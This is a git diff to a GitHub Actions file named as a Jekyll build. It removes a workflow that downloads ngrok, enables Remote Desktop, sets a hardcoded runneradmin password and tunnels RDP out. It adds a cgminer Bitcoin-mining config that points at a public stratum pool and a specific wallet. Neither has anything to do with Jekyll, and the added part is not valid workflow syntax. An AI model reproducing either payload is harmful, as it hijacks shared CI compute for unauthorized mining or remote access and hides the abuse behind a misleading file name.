--- a/.github/workflows/jekyll-docker.yml
+++ b/.github/workflows/jekyll-docker.yml
@@ -1,21 +1,14 @@
-name: CI
-on: [push, workflow_dispatch]
-jobs:
-  build:
-    runs-on: windows-latest
-    steps:
-    - name: Download
-      run: Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
-    - name: Extract
-      run: Expand-Archive ngrok.zip
-    - name: Auth
-      run: .\ngrok\ngrok.exe authtoken $Env:NGROK_AUTH_TOKEN
-      env:
-        NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
-    - name: Enable TS
-      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
-    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
-    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
-    - run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "P@ssw0rd!" -Force)
-    - name: Create Tunnel
-      run: .\ngrok\ngrok.exe tcp 3389
+pre-install: # pre-installation commands
+ - sudo apt-get update
+ - sudo apt-get install cgminer libcurl4-openssl-dev libjansson-dev libssl-dev
+
+globalminer: # global settings for the miner
+ algo: sha-256d # algorithm to use for mining (sha-256d for Bitcoin)
+ pools: # list of pool servers to mine on
+    - StratumAddress: stratum+tcp://public-pool.io:21496
+      Username: <bc1qs62yqlaqj40gd4u5yelyguag4ct74a0asne3xm>.<foxxz>
+      Password: x
+      Wallet: <bc1qs62yqlaqj40gd4u5yelyguag4ct74a0asne3xm> #
+
+post-install: # post-installation commands
+ - cgminer --config your_config_file.yml
